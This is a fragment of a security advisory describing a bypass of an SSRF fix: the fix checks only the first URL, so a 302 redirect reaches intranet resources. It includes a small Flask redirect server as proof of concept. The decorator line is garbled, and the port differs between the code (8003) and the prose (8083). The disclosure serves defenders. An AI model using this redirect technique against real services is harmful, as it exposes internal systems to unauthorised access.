"details": "### Summary\nA recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur.\nBecause the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet.\n\n### Details\nUse the following script to deploy on the attacker's server. Since ports 80, 443, and 8080 are default ports within the security range set by the administrator and will not be blocked, the service is deployed on port 8080.\n```\nfrom flask import Flask, redirect \n \napp = Flask(__name__) \n \
[email protected]('/redirect') \ndef ssrf_redirect(): \n return redirect('http://127.0.0.1:8003/uid.txt', code=302) \n \nif __name__ == '__main__': \n app.run(host='0.0.0.0', port=8080)\n```\nThen, a request is made to the malicious service opened by the attacker, and it can be found that the resources on the intranet are successfully accessed.\n<img width=\"663\" height=\"60\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2f296cff-510d-4cfe-8509-518e747bf8fe\" />\nAt the same time, the locally opened service 127.0.0.1:8083/uid.txt also received related requests.\n<img width=\"717\" height=\"79\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d6b6d2cc-280b-45b5-9946-10b7891bf017\" />\n\n### Impact\nUsing 302 redirects to bypass previous SSRF security fixes",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments